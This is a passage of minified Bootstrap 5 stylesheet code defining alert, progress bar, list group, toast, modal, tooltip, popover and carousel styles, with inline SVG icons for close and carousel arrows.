.alert-link{color:#04414d}.alert-warning{--bs-alert-color:#664d03;--bs-alert-bg:#fff3cd;--bs-alert-border-color:#ffecb5}.alert-warning .alert-link{color:#523e02}.alert-danger{--bs-alert-color:#842029;--bs-alert-bg:#f8d7da;--bs-alert-border-color:#f5c2c7}.alert-danger .alert-link{color:#6a1a21}.alert-light{--bs-alert-color:#636464;--bs-alert-bg:#fefefe;--bs-alert-border-color:#fdfdfe}.alert-light .alert-link{color:#4f5050}.alert-dark{--bs-alert-color:#141619;--bs-alert-bg:#d3d3d4;--bs-alert-border-color:#bcbebf}.alert-dark .alert-link{color:#101214}@keyframes progress-bar-stripes{0%{background-position-x:1rem}}.progress{--bs-progress-height:1rem;--bs-progress-font-size:0.75rem;--bs-progress-bg:#e9ecef;--bs-progress-border-radius:0.375rem;--bs-progress-box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.075);--bs-progress-bar-color:#fff;--bs-progress-bar-bg:#0d6efd;--bs-progress-bar-transition:width 0.6s ease;display:flex;height:var(--bs-progress-height);overflow:hidden;font-size:var(--bs-progress-font-size);background-color:var(--bs-progress-bg);border-radius:var(--bs-progress-border-radius)}.progress-bar{display:flex;flex-direction:column;justify-content:center;overflow:hidden;color:var(--bs-progress-bar-color);text-align:center;white-space:nowrap;background-color:var(--bs-progress-bar-bg);transition:var(--bs-progress-bar-transition)}@media (prefers-reduced-motion:reduce){.progress-bar{transition:none}}.progress-bar-striped{background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-size:var(--bs-progress-height) var(--bs-progress-height)}.progress-bar-animated{animation:1s linear infinite progress-bar-stripes}@media (prefers-reduced-motion:reduce){.progress-bar-animated{animation:none}}.list-group{--bs-list-group-color:#212529;--bs-list-group-bg:#fff;--bs-list-group-border-color:rgba(0, 0, 0, 0.125);--bs-list-group-border-width:1px;--bs-list-group-border-radius:0.375rem;--bs-list-group-item-padding-x:1rem;--bs-list-group-item-padding-y:0.5rem;--bs-list-group-action-color:#495057;--bs-list-group-action-hover-color:#495057;--bs-list-group-action-hover-bg:#f8f9fa;--bs-list-group-action-active-color:#212529;--bs-list-group-action-active-bg:#e9ecef;--bs-list-group-disabled-color:#6c757d;--bs-list-group-disabled-bg:#fff;--bs-list-group-active-color:#fff;--bs-list-group-active-bg:#0d6efd;--bs-list-group-active-border-color:#0d6efd;display:flex;flex-direction:column;padding-left:0;margin-bottom:0;border-radius:var(--bs-list-group-border-radius)}.list-group-numbered{list-style-type:none;counter-reset:section}.list-group-numbered>.list-group-item::before{content:counters(section, ".") ". ";counter-increment:section}.list-group-item-action{width:100%;color:var(--bs-list-group-action-color);text-align:inherit}.list-group-item-action:focus,.list-group-item-action:hover{z-index:1;color:var(--bs-list-group-action-hover-color);text-decoration:none;background-color:var(--bs-list-group-action-hover-bg)}.list-group-item-action:active{color:var(--bs-list-group-action-active-color);background-color:var(--bs-list-group-action-active-bg)}.list-group-item{position:relative;display:block;padding:var(--bs-list-group-item-padding-y) var(--bs-list-group-item-padding-x);color:var(--bs-list-group-color);text-decoration:none;background-color:var(--bs-list-group-bg);border:var(--bs-list-group-border-width) solid var(--bs-list-group-border-color)}.list-group-item:first-child{border-top-left-radius:inherit;border-top-right-radius:inherit}.list-group-item:last-child{border-bottom-right-radius:inherit;border-bottom-left-radius:inherit}.list-group-item.disabled,.list-group-item:disabled{color:var(--bs-list-group-disabled-color);pointer-events:none;background-color:var(--bs-list-group-disabled-bg)}.list-group-item.active{z-index:2;color:var(--bs-list-group-active-color);background-color:var(--bs-list-group-active-bg);border-color:var(--bs-list-group-active-border-color)}.list-group-item+.list-group-item{border-top-width:0}.list-group-item+.list-group-item.active{margin-top:calc(-1 * var(--bs-list-group-border-width));border-top-width:var(--bs-list-group-border-width)}.list-group-horizontal{flex-direction:row}.list-group-horizontal>.list-group-item:first-child:not(:last-child){border-bottom-left-radius:var(--bs-list-group-border-radius);border-top-right-radius:0}.list-group-horizontal>.list-group-item:last-child:not(:first-child){border-top-right-radius:var(--bs-list-group-border-radius);border-bottom-left-radius:0}.list-group-horizontal>.list-group-item.active{margin-top:0}.list-group-horizontal>.list-group-item+.list-group-item{border-top-width:var(--bs-list-group-border-width);border-left-width:0}.list-group-horizontal>.list-group-item+.list-group-item.active{margin-left:calc(-1 * var(--bs-list-group-border-width));border-left-width:var(--bs-list-group-border-width)}@media (min-width:576px){.list-group-horizontal-sm{flex-direction:row}.list-group-horizontal-sm>.list-group-item:first-child:not(:last-child){border-bottom-left-radius:var(--bs-list-group-border-radius);border-top-right-radius:0}.list-group-horizontal-sm>.list-group-item:last-child:not(:first-child){border-top-right-radius:var(--bs-list-group-border-radius);border-bottom-left-radius:0}.list-group-horizontal-sm>.list-group-item.active{margin-top:0}.list-group-horizontal-sm>.list-group-item+.list-group-item{border-top-width:var(--bs-list-group-border-width);border-left-width:0}.list-group-horizontal-sm>.list-group-item+.list-group-item.active{margin-left:calc(-1 * var(--bs-list-group-border-width));border-left-width:var(--bs-list-group-border-width)}}@media (min-width:768px){.list-group-horizontal-md{flex-direction:row}.list-group-horizontal-md>.list-group-item:first-child:not(:last-child){border-bottom-left-radius:var(--bs-list-group-border-radius);border-top-right-radius:0}.list-group-horizontal-md>.list-group-item:last-child:not(:first-child){border-top-right-radius:var(--bs-list-group-border-radius);border-bottom-left-radius:0}.list-group-horizontal-md>.list-group-item.active{margin-top:0}.list-group-horizontal-md>.list-group-item+.list-group-item{border-top-width:var(--bs-list-group-border-width);border-left-width:0}.list-group-horizontal-md>.list-group-item+.list-group-item.active{margin-left:calc(-1 * var(--bs-list-group-border-width));border-left-width:var(--bs-list-group-border-width)}}@media (min-width:992px){.list-group-horizontal-lg{flex-direction:row}.list-group-horizontal-lg>.list-group-item:first-child:not(:last-child){border-bottom-left-radius:var(--bs-list-group-border-radius);border-top-right-radius:0}.list-group-horizontal-lg>.list-group-item:last-child:not(:first-child){border-top-right-radius:var(--bs-list-group-border-radius);border-bottom-left-radius:0}.list-group-horizontal-lg>.list-group-item.active{margin-top:0}.list-group-horizontal-lg>.list-group-item+.list-group-item{border-top-width:var(--bs-list-group-border-width);border-left-width:0}.list-group-horizontal-lg>.list-group-item+.list-group-item.active{margin-left:calc(-1 * var(--bs-list-group-border-width));border-left-width:var(--bs-list-group-border-width)}}@media (min-width:1200px){.list-group-horizontal-xl{flex-direction:row}.list-group-horizontal-xl>.list-group-item:first-child:not(:last-child){border-bottom-left-radius:var(--bs-list-group-border-radius);border-top-right-radius:0}.list-group-horizontal-xl>.list-group-item:last-child:not(:first-child){border-top-right-radius:var(--bs-list-group-border-radius);border-bottom-left-radius:0}.list-group-horizontal-xl>.list-group-item.active{margin-top:0}.list-group-horizontal-xl>.list-group-item+.list-group-item{border-top-width:var(--bs-list-group-border-width);border-left-width:0}.list-group-horizontal-xl>.list-group-item+.list-group-item.active{margin-left:calc(-1 * var(--bs-list-group-border-width));border-left-width:var(--bs-list-group-border-width)}}@media (min-width:1400px){.list-group-horizontal-xxl{flex-direction:row}.list-group-horizontal-xxl>.list-group-item:first-child:not(:last-child){border-bottom-left-radius:var(--bs-list-group-border-radius);border-top-right-radius:0}.list-group-horizontal-xxl>.list-group-item:last-child:not(:first-child){border-top-right-radius:var(--bs-list-group-border-radius);border-bottom-left-radius:0}.list-group-horizontal-xxl>.list-group-item.active{margin-top:0}.list-group-horizontal-xxl>.list-group-item+.list-group-item{border-top-width:var(--bs-list-group-border-width);border-left-width:0}.list-group-horizontal-xxl>.list-group-item+.list-group-item.active{margin-left:calc(-1 * var(--bs-list-group-border-width));border-left-width:var(--bs-list-group-border-width)}}.list-group-flush{border-radius:0}.list-group-flush>.list-group-item{border-width:0 0 var(--bs-list-group-border-width)}.list-group-flush>.list-group-item:last-child{border-bottom-width:0}.list-group-item-primary{color:#084298;background-color:#cfe2ff}.list-group-item-primary.list-group-item-action:focus,.list-group-item-primary.list-group-item-action:hover{color:#084298;background-color:#bacbe6}.list-group-item-primary.list-group-item-action.active{color:#fff;background-color:#084298;border-color:#084298}.list-group-item-secondary{color:#41464b;background-color:#e2e3e5}.list-group-item-secondary.list-group-item-action:focus,.list-group-item-secondary.list-group-item-action:hover{color:#41464b;background-color:#cbccce}.list-group-item-secondary.list-group-item-action.active{color:#fff;background-color:#41464b;border-color:#41464b}.list-group-item-success{color:#0f5132;background-color:#d1e7dd}.list-group-item-success.list-group-item-action:focus,.list-group-item-success.list-group-item-action:hover{color:#0f5132;background-color:#bcd0c7}.list-group-item-success.list-group-item-action.active{color:#fff;background-color:#0f5132;border-color:#0f5132}.list-group-item-info{color:#055160;background-color:#cff4fc}.list-group-item-info.list-group-item-action:focus,.list-group-item-info.list-group-item-action:hover{color:#055160;background-color:#badce3}.list-group-item-info.list-group-item-action.active{color:#fff;background-color:#055160;border-color:#055160}.list-group-item-warning{color:#664d03;background-color:#fff3cd}.list-group-item-warning.list-group-item-action:focus,.list-group-item-warning.list-group-item-action:hover{color:#664d03;background-color:#e6dbb9}.list-group-item-warning.list-group-item-action.active{color:#fff;background-color:#664d03;border-color:#664d03}.list-group-item-danger{color:#842029;background-color:#f8d7da}.list-group-item-danger.list-group-item-action:focus,.list-group-item-danger.list-group-item-action:hover{color:#842029;background-color:#dfc2c4}.list-group-item-danger.list-group-item-action.active{color:#fff;background-color:#842029;border-color:#842029}.list-group-item-light{color:#636464;background-color:#fefefe}.list-group-item-light.list-group-item-action:focus,.list-group-item-light.list-group-item-action:hover{color:#636464;background-color:#e5e5e5}.list-group-item-light.list-group-item-action.active{color:#fff;background-color:#636464;border-color:#636464}.list-group-item-dark{color:#141619;background-color:#d3d3d4}.list-group-item-dark.list-group-item-action:focus,.list-group-item-dark.list-group-item-action:hover{color:#141619;background-color:#bebebf}.list-group-item-dark.list-group-item-action.active{color:#fff;background-color:#141619;border-color:#141619}.btn-close{box-sizing:content-box;width:1em;height:1em;padding:.25em .25em;color:#000;background:transparent url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23000'%3e%3cpath d='M.293.293a1 1 0 0 1 1.414 0L8 6.586 14.293.293a1 1 0 1 1 1.414 1.414L9.414 8l6.293 6.293a1 1 0 0 1-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 0 1-1.414-1.414L6.586 8 .293 1.707a1 1 0 0 1 0-1.414z'/%3e%3c/svg%3e") center/1em auto no-repeat;border:0;border-radius:.375rem;opacity:.5}.btn-close:hover{color:#000;text-decoration:none;opacity:.75}.btn-close:focus{outline:0;box-shadow:0 0 0 .25rem rgba(13,110,253,.25);opacity:1}.btn-close.disabled,.btn-close:disabled{pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none;opacity:.25}.btn-close-white{filter:invert(1) grayscale(100%) brightness(200%)}.toast{--bs-toast-zindex:1090;--bs-toast-padding-x:0.75rem;--bs-toast-padding-y:0.5rem;--bs-toast-spacing:1.5rem;--bs-toast-max-width:350px;--bs-toast-font-size:0.875rem;--bs-toast-color: ;--bs-toast-bg:rgba(255, 255, 255, 0.85);--bs-toast-border-width:1px;--bs-toast-border-color:var(--bs-border-color-translucent);--bs-toast-border-radius:0.375rem;--bs-toast-box-shadow:0 0.5rem 1rem rgba(0, 0, 0, 0.15);--bs-toast-header-color:#6c757d;--bs-toast-header-bg:rgba(255, 255, 255, 0.85);--bs-toast-header-border-color:rgba(0, 0, 0, 0.05);width:var(--bs-toast-max-width);max-width:100%;font-size:var(--bs-toast-font-size);color:var(--bs-toast-color);pointer-events:auto;background-color:var(--bs-toast-bg);background-clip:padding-box;border:var(--bs-toast-border-width) solid var(--bs-toast-border-color);box-shadow:var(--bs-toast-box-shadow);border-radius:var(--bs-toast-border-radius)}.toast.showing{opacity:0}.toast:not(.show){display:none}.toast-container{--bs-toast-zindex:1090;position:absolute;z-index:var(--bs-toast-zindex);width:-webkit-max-content;width:-moz-max-content;width:max-content;max-width:100%;pointer-events:none}.toast-container>:not(:last-child){margin-bottom:var(--bs-toast-spacing)}.toast-header{display:flex;align-items:center;padding:var(--bs-toast-padding-y) var(--bs-toast-padding-x);color:var(--bs-toast-header-color);background-color:var(--bs-toast-header-bg);background-clip:padding-box;border-bottom:var(--bs-toast-border-width) solid var(--bs-toast-header-border-color);border-top-left-radius:calc(var(--bs-toast-border-radius) - var(--bs-toast-border-width));border-top-right-radius:calc(var(--bs-toast-border-radius) - var(--bs-toast-border-width))}.toast-header .btn-close{margin-right:calc(-.5 * var(--bs-toast-padding-x));margin-left:var(--bs-toast-padding-x)}.toast-body{padding:var(--bs-toast-padding-x);word-wrap:break-word}.modal{--bs-modal-zindex:1055;--bs-modal-width:500px;--bs-modal-padding:1rem;--bs-modal-margin:0.5rem;--bs-modal-color: ;--bs-modal-bg:#fff;--bs-modal-border-color:var(--bs-border-color-translucent);--bs-modal-border-width:1px;--bs-modal-border-radius:0.5rem;--bs-modal-box-shadow:0 0.125rem 0.25rem rgba(0, 0, 0, 0.075);--bs-modal-inner-border-radius:calc(0.5rem - 1px);--bs-modal-header-padding-x:1rem;--bs-modal-header-padding-y:1rem;--bs-modal-header-padding:1rem 1rem;--bs-modal-header-border-color:var(--bs-border-color);--bs-modal-header-border-width:1px;--bs-modal-title-line-height:1.5;--bs-modal-footer-gap:0.5rem;--bs-modal-footer-bg: ;--bs-modal-footer-border-color:var(--bs-border-color);--bs-modal-footer-border-width:1px;position:fixed;top:0;left:0;z-index:var(--bs-modal-zindex);display:none;width:100%;height:100%;overflow-x:hidden;overflow-y:auto;outline:0}.modal-dialog{position:relative;width:auto;margin:var(--bs-modal-margin);pointer-events:none}.modal.fade .modal-dialog{transition:transform .3s ease-out;transform:translate(0,-50px)}@media (prefers-reduced-motion:reduce){.modal.fade .modal-dialog{transition:none}}.modal.show .modal-dialog{transform:none}.modal.modal-static .modal-dialog{transform:scale(1.02)}.modal-dialog-scrollable{height:calc(100% - var(--bs-modal-margin) * 2)}.modal-dialog-scrollable .modal-content{max-height:100%;overflow:hidden}.modal-dialog-scrollable .modal-body{overflow-y:auto}.modal-dialog-centered{display:flex;align-items:center;min-height:calc(100% - var(--bs-modal-margin) * 2)}.modal-content{position:relative;display:flex;flex-direction:column;width:100%;color:var(--bs-modal-color);pointer-events:auto;background-color:var(--bs-modal-bg);background-clip:padding-box;border:var(--bs-modal-border-width) solid var(--bs-modal-border-color);border-radius:var(--bs-modal-border-radius);outline:0}.modal-backdrop{--bs-backdrop-zindex:1050;--bs-backdrop-bg:#000;--bs-backdrop-opacity:0.5;position:fixed;top:0;left:0;z-index:var(--bs-backdrop-zindex);width:100vw;height:100vh;background-color:var(--bs-backdrop-bg)}.modal-backdrop.fade{opacity:0}.modal-backdrop.show{opacity:var(--bs-backdrop-opacity)}.modal-header{display:flex;flex-shrink:0;align-items:center;justify-content:space-between;padding:var(--bs-modal-header-padding);border-bottom:var(--bs-modal-header-border-width) solid var(--bs-modal-header-border-color);border-top-left-radius:var(--bs-modal-inner-border-radius);border-top-right-radius:var(--bs-modal-inner-border-radius)}.modal-header .btn-close{padding:calc(var(--bs-modal-header-padding-y) * .5) calc(var(--bs-modal-header-padding-x) * .5);margin:calc(-.5 * var(--bs-modal-header-padding-y)) calc(-.5 * var(--bs-modal-header-padding-x)) calc(-.5 * var(--bs-modal-header-padding-y)) auto}.modal-title{margin-bottom:0;line-height:var(--bs-modal-title-line-height)}.modal-body{position:relative;flex:1 1 auto;padding:var(--bs-modal-padding)}.modal-footer{display:flex;flex-shrink:0;flex-wrap:wrap;align-items:center;justify-content:flex-end;padding:calc(var(--bs-modal-padding) - var(--bs-modal-footer-gap) * .5);background-color:var(--bs-modal-footer-bg);border-top:var(--bs-modal-footer-border-width) solid var(--bs-modal-footer-border-color);border-bottom-right-radius:var(--bs-modal-inner-border-radius);border-bottom-left-radius:var(--bs-modal-inner-border-radius)}.modal-footer>*{margin:calc(var(--bs-modal-footer-gap) * .5)}@media (min-width:576px){.modal{--bs-modal-margin:1.75rem;--bs-modal-box-shadow:0 0.5rem 1rem rgba(0, 0, 0, 0.15)}.modal-dialog{max-width:var(--bs-modal-width);margin-right:auto;margin-left:auto}.modal-sm{--bs-modal-width:300px}}@media (min-width:992px){.modal-lg,.modal-xl{--bs-modal-width:800px}}@media (min-width:1200px){.modal-xl{--bs-modal-width:1140px}}.modal-fullscreen{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen .modal-footer,.modal-fullscreen .modal-header{border-radius:0}.modal-fullscreen .modal-body{overflow-y:auto}@media (max-width:575.98px){.modal-fullscreen-sm-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-sm-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-sm-down .modal-footer,.modal-fullscreen-sm-down .modal-header{border-radius:0}.modal-fullscreen-sm-down .modal-body{overflow-y:auto}}@media (max-width:767.98px){.modal-fullscreen-md-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-md-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-md-down .modal-footer,.modal-fullscreen-md-down .modal-header{border-radius:0}.modal-fullscreen-md-down .modal-body{overflow-y:auto}}@media (max-width:991.98px){.modal-fullscreen-lg-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-lg-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-lg-down .modal-footer,.modal-fullscreen-lg-down .modal-header{border-radius:0}.modal-fullscreen-lg-down .modal-body{overflow-y:auto}}@media (max-width:1199.98px){.modal-fullscreen-xl-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-xl-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-xl-down .modal-footer,.modal-fullscreen-xl-down .modal-header{border-radius:0}.modal-fullscreen-xl-down .modal-body{overflow-y:auto}}@media (max-width:1399.98px){.modal-fullscreen-xxl-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-xxl-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-xxl-down .modal-footer,.modal-fullscreen-xxl-down .modal-header{border-radius:0}.modal-fullscreen-xxl-down .modal-body{overflow-y:auto}}.tooltip{--bs-tooltip-zindex:1080;--bs-tooltip-max-width:200px;--bs-tooltip-padding-x:0.5rem;--bs-tooltip-padding-y:0.25rem;--bs-tooltip-margin: ;--bs-tooltip-font-size:0.875rem;--bs-tooltip-color:#fff;--bs-tooltip-bg:#000;--bs-tooltip-border-radius:0.375rem;--bs-tooltip-opacity:0.9;--bs-tooltip-arrow-width:0.8rem;--bs-tooltip-arrow-height:0.4rem;z-index:var(--bs-tooltip-zindex);display:block;padding:var(--bs-tooltip-arrow-height);margin:var(--bs-tooltip-margin);font-family:var(--bs-font-sans-serif);font-style:normal;font-weight:400;line-height:1.5;text-align:left;text-align:start;text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;white-space:normal;word-spacing:normal;line-break:auto;font-size:var(--bs-tooltip-font-size);word-wrap:break-word;opacity:0}.tooltip.show{opacity:var(--bs-tooltip-opacity)}.tooltip .tooltip-arrow{display:block;width:var(--bs-tooltip-arrow-width);height:var(--bs-tooltip-arrow-height)}.tooltip .tooltip-arrow::before{position:absolute;content:"";border-color:transparent;border-style:solid}.bs-tooltip-auto[data-popper-placement^=top] .tooltip-arrow,.bs-tooltip-top .tooltip-arrow{bottom:0}.bs-tooltip-auto[data-popper-placement^=top] .tooltip-arrow::before,.bs-tooltip-top .tooltip-arrow::before{top:-1px;border-width:var(--bs-tooltip-arrow-height) calc(var(--bs-tooltip-arrow-width) * .5) 0;border-top-color:var(--bs-tooltip-bg)}.bs-tooltip-auto[data-popper-placement^=right] .tooltip-arrow,.bs-tooltip-end .tooltip-arrow{left:0;width:var(--bs-tooltip-arrow-height);height:var(--bs-tooltip-arrow-width)}.bs-tooltip-auto[data-popper-placement^=right] .tooltip-arrow::before,.bs-tooltip-end .tooltip-arrow::before{right:-1px;border-width:calc(var(--bs-tooltip-arrow-width) * .5) var(--bs-tooltip-arrow-height) calc(var(--bs-tooltip-arrow-width) * .5) 0;border-right-color:var(--bs-tooltip-bg)}.bs-tooltip-auto[data-popper-placement^=bottom] .tooltip-arrow,.bs-tooltip-bottom .tooltip-arrow{top:0}.bs-tooltip-auto[data-popper-placement^=bottom] .tooltip-arrow::before,.bs-tooltip-bottom .tooltip-arrow::before{bottom:-1px;border-width:0 calc(var(--bs-tooltip-arrow-width) * .5) var(--bs-tooltip-arrow-height);border-bottom-color:var(--bs-tooltip-bg)}.bs-tooltip-auto[data-popper-placement^=left] .tooltip-arrow,.bs-tooltip-start .tooltip-arrow{right:0;width:var(--bs-tooltip-arrow-height);height:var(--bs-tooltip-arrow-width)}.bs-tooltip-auto[data-popper-placement^=left] .tooltip-arrow::before,.bs-tooltip-start .tooltip-arrow::before{left:-1px;border-width:calc(var(--bs-tooltip-arrow-width) * .5) 0 calc(var(--bs-tooltip-arrow-width) * .5) var(--bs-tooltip-arrow-height);border-left-color:var(--bs-tooltip-bg)}.tooltip-inner{max-width:var(--bs-tooltip-max-width);padding:var(--bs-tooltip-padding-y) var(--bs-tooltip-padding-x);color:var(--bs-tooltip-color);text-align:center;background-color:var(--bs-tooltip-bg);border-radius:var(--bs-tooltip-border-radius)}.popover{--bs-popover-zindex:1070;--bs-popover-max-width:276px;--bs-popover-font-size:0.875rem;--bs-popover-bg:#fff;--bs-popover-border-width:1px;--bs-popover-border-color:var(--bs-border-color-translucent);--bs-popover-border-radius:0.5rem;--bs-popover-inner-border-radius:calc(0.5rem - 1px);--bs-popover-box-shadow:0 0.5rem 1rem rgba(0, 0, 0, 0.15);--bs-popover-header-padding-x:1rem;--bs-popover-header-padding-y:0.5rem;--bs-popover-header-font-size:1rem;--bs-popover-header-color: ;--bs-popover-header-bg:#f0f0f0;--bs-popover-body-padding-x:1rem;--bs-popover-body-padding-y:1rem;--bs-popover-body-color:#212529;--bs-popover-arrow-width:1rem;--bs-popover-arrow-height:0.5rem;--bs-popover-arrow-border:var(--bs-popover-border-color);z-index:var(--bs-popover-zindex);display:block;max-width:var(--bs-popover-max-width);font-family:var(--bs-font-sans-serif);font-style:normal;font-weight:400;line-height:1.5;text-align:left;text-align:start;text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;white-space:normal;word-spacing:normal;line-break:auto;font-size:var(--bs-popover-font-size);word-wrap:break-word;background-color:var(--bs-popover-bg);background-clip:padding-box;border:var(--bs-popover-border-width) solid var(--bs-popover-border-color);border-radius:var(--bs-popover-border-radius)}.popover .popover-arrow{display:block;width:var(--bs-popover-arrow-width);height:var(--bs-popover-arrow-height)}.popover .popover-arrow::after,.popover .popover-arrow::before{position:absolute;display:block;content:"";border-color:transparent;border-style:solid;border-width:0}.bs-popover-auto[data-popper-placement^=top]>.popover-arrow,.bs-popover-top>.popover-arrow{bottom:calc(-1 * (var(--bs-popover-arrow-height)) - var(--bs-popover-border-width))}.bs-popover-auto[data-popper-placement^=top]>.popover-arrow::after,.bs-popover-auto[data-popper-placement^=top]>.popover-arrow::before,.bs-popover-top>.popover-arrow::after,.bs-popover-top>.popover-arrow::before{border-width:var(--bs-popover-arrow-height) calc(var(--bs-popover-arrow-width) * .5) 0}.bs-popover-auto[data-popper-placement^=top]>.popover-arrow::before,.bs-popover-top>.popover-arrow::before{bottom:0;border-top-color:var(--bs-popover-arrow-border)}.bs-popover-auto[data-popper-placement^=top]>.popover-arrow::after,.bs-popover-top>.popover-arrow::after{bottom:var(--bs-popover-border-width);border-top-color:var(--bs-popover-bg)}.bs-popover-auto[data-popper-placement^=right]>.popover-arrow,.bs-popover-end>.popover-arrow{left:calc(-1 * (var(--bs-popover-arrow-height)) - var(--bs-popover-border-width));width:var(--bs-popover-arrow-height);height:var(--bs-popover-arrow-width)}.bs-popover-auto[data-popper-placement^=right]>.popover-arrow::after,.bs-popover-auto[data-popper-placement^=right]>.popover-arrow::before,.bs-popover-end>.popover-arrow::after,.bs-popover-end>.popover-arrow::before{border-width:calc(var(--bs-popover-arrow-width) * .5) var(--bs-popover-arrow-height) calc(var(--bs-popover-arrow-width) * .5) 0}.bs-popover-auto[data-popper-placement^=right]>.popover-arrow::before,.bs-popover-end>.popover-arrow::before{left:0;border-right-color:var(--bs-popover-arrow-border)}.bs-popover-auto[data-popper-placement^=right]>.popover-arrow::after,.bs-popover-end>.popover-arrow::after{left:var(--bs-popover-border-width);border-right-color:var(--bs-popover-bg)}.bs-popover-auto[data-popper-placement^=bottom]>.popover-arrow,.bs-popover-bottom>.popover-arrow{top:calc(-1 * (var(--bs-popover-arrow-height)) - var(--bs-popover-border-width))}.bs-popover-auto[data-popper-placement^=bottom]>.popover-arrow::after,.bs-popover-auto[data-popper-placement^=bottom]>.popover-arrow::before,.bs-popover-bottom>.popover-arrow::after,.bs-popover-bottom>.popover-arrow::before{border-width:0 calc(var(--bs-popover-arrow-width) * .5) var(--bs-popover-arrow-height)}.bs-popover-auto[data-popper-placement^=bottom]>.popover-arrow::before,.bs-popover-bottom>.popover-arrow::before{top:0;border-bottom-color:var(--bs-popover-arrow-border)}.bs-popover-auto[data-popper-placement^=bottom]>.popover-arrow::after,.bs-popover-bottom>.popover-arrow::after{top:var(--bs-popover-border-width);border-bottom-color:var(--bs-popover-bg)}.bs-popover-auto[data-popper-placement^=bottom] .popover-header::before,.bs-popover-bottom .popover-header::before{position:absolute;top:0;left:50%;display:block;width:var(--bs-popover-arrow-width);margin-left:calc(-.5 * var(--bs-popover-arrow-width));content:"";border-bottom:var(--bs-popover-border-width) solid var(--bs-popover-header-bg)}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow,.bs-popover-start>.popover-arrow{right:calc(-1 * (var(--bs-popover-arrow-height)) - var(--bs-popover-border-width));width:var(--bs-popover-arrow-height);height:var(--bs-popover-arrow-width)}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow::after,.bs-popover-auto[data-popper-placement^=left]>.popover-arrow::before,.bs-popover-start>.popover-arrow::after,.bs-popover-start>.popover-arrow::before{border-width:calc(var(--bs-popover-arrow-width) * .5) 0 calc(var(--bs-popover-arrow-width) * .5) var(--bs-popover-arrow-height)}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow::before,.bs-popover-start>.popover-arrow::before{right:0;border-left-color:var(--bs-popover-arrow-border)}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow::after,.bs-popover-start>.popover-arrow::after{right:var(--bs-popover-border-width);border-left-color:var(--bs-popover-bg)}.popover-header{padding:var(--bs-popover-header-padding-y) var(--bs-popover-header-padding-x);margin-bottom:0;font-size:var(--bs-popover-header-font-size);color:var(--bs-popover-header-color);background-color:var(--bs-popover-header-bg);border-bottom:var(--bs-popover-border-width) solid var(--bs-popover-border-color);border-top-left-radius:var(--bs-popover-inner-border-radius);border-top-right-radius:var(--bs-popover-inner-border-radius)}.popover-header:empty{display:none}.popover-body{padding:var(--bs-popover-body-padding-y) var(--bs-popover-body-padding-x);color:var(--bs-popover-body-color)}.carousel{position:relative}.carousel.pointer-event{touch-action:pan-y}.carousel-inner{position:relative;width:100%;overflow:hidden}.carousel-inner::after{display:block;clear:both;content:""}.carousel-item{position:relative;display:none;float:left;width:100%;margin-right:-100%;-webkit-backface-visibility:hidden;backface-visibility:hidden;transition:transform .6s ease-in-out}@media (prefers-reduced-motion:reduce){.carousel-item{transition:none}}.carousel-item-next,.carousel-item-prev,.carousel-item.active{display:block}.active.carousel-item-end,.carousel-item-next:not(.carousel-item-start){transform:translateX(100%)}.active.carousel-item-start,.carousel-item-prev:not(.carousel-item-end){transform:translateX(-100%)}.carousel-fade .carousel-item{opacity:0;transition-property:opacity;transform:none}.carousel-fade .carousel-item-next.carousel-item-start,.carousel-fade .carousel-item-prev.carousel-item-end,.carousel-fade .carousel-item.active{z-index:1;opacity:1}.carousel-fade .active.carousel-item-end,.carousel-fade .active.carousel-item-start{z-index:0;opacity:0;transition:opacity 0s .6s}@media (prefers-reduced-motion:reduce){.carousel-fade .active.carousel-item-end,.carousel-fade .active.carousel-item-start{transition:none}}.carousel-control-next,.carousel-control-prev{position:absolute;top:0;bottom:0;z-index:1;display:flex;align-items:center;justify-content:center;width:15%;padding:0;color:#fff;text-align:center;background:0 0;border:0;opacity:.5;transition:opacity .15s ease}@media (prefers-reduced-motion:reduce){.carousel-control-next,.carousel-control-prev{transition:none}}.carousel-control-next:focus,.carousel-control-next:hover,.carousel-control-prev:focus,.carousel-control-prev:hover{color:#fff;text-decoration:none;outline:0;opacity:.9}.carousel-control-prev{left:0}.carousel-control-next{right:0}.carousel-control-next-icon,.carousel-control-prev-icon{display:inline-block;width:2rem;height:2rem;background-repeat:no-repeat;background-position:50%;background-size:100% 100%}.carousel-control-prev-icon{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23fff'%3e%3cpath d='M11.354 1.646a.5.5 0 0 1 0 .708L5.707 8l5.647 5.646a.5.5 0 0 1-.708.708l-6-6a.5.5 0 0 1 0-.708l6-6a.5.5 0 0 1 .708 0z'/%3e%3c/svg%3e")}.carousel-control-next-icon{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23fff'%3e%3cpath d='M4.646 1.646a.5.5 0 0 1 .708 0l6 6a.5.5 0 0 1 0 .708l-6 6a.5.5 0 0 1-.708-.708L10.293 8 4.646 2.354a.5.5 0 0 1 